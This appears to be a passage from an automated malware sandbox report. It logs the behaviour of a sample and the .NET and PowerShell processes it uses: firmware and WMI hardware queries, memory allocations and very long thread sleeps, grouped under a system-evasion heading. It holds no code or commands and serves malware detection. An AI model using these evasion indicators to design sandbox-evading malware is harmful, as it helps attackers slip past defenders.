Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe System information queried: FirmwareTableInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Memory allocated: 280062D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Memory allocated: 28007D50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Memory allocated: 28027D50000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory allocated: 203FB820000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory allocated: 203FD030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory allocated: 29DD3410000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory allocated: 29DD4BE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\KPn7VgIWQj.exe Memory allocated: 29DF4BE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1200000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1199874 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1198890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1198781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1198671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1197828 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1197718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1197609 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1196812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1196697 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1196593 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5673 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4066 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Window / User API: threadDelayed 2702 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Window / User API: threadDelayed 7028 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1540
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4812 Thread sleep count: 5673 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4812 Thread sleep count: 4066 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -22136092888451448s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -119748s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -119530s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -178968s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -59546s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -178311s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -177984s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -59218s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -59109s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -59000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7184 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1200000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1199874s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -59547s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1198890s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1198781s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1198671s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -179673s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -119532s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -59615s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -59500s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -59391s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -59266s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1197828s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1197718s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1197609s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1196812s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1196697s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe TID: 7244 Thread sleep time: -1196593s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep count: 1540 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
